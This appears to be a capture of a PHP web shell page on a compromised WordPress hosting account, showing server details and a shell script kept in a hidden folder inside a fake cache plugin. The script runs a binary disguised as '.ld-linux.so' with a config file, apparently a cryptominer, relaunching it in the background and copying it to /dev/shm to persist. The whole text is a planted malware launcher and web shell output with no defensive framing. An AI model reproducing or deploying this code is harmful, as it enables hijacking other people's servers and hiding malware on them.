| Server IP : 145.239.37.162 / Your IP : 216.73.216.72 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaa/www1/wp-content/plugins/wp-cache-657a2e/.c341165261/ |
Upload File : |
#!/bin/sh D=/home/verseaa/www1/wp-content/plugins/wp-cache-657a2e/.c341165261 export HWLOC_ALLOW=all HWLOC_HIDE_ERRORS=1 B=$D/.ld-linux.so;C=$D/config.json ps -eo comm= 2>/dev/null|grep -Fx .ld-linux.so>/dev/null&&exit 0 ps -eo args= 2>/dev/null|grep -F -- "$C"|grep -v grep>/dev/null&&exit 0 cd "$D";nohup "$B" -c "$C" --no-color --background >/dev/null 2>&1 & sleep 1 ps -eo comm= 2>/dev/null|grep -Fx .ld-linux.so>/dev/null&&exit 0 SD=/dev/shm/.c3p;mkdir -p "$SD";cp "$B" "$SD/.ld-linux.so";cp "$C" "$SD/config.json";chmod +x "$SD/.ld-linux.so";nohup "$SD/.ld-linux.so" -c "$SD/config.json" --no-color --background >/dev/null 2>&1 &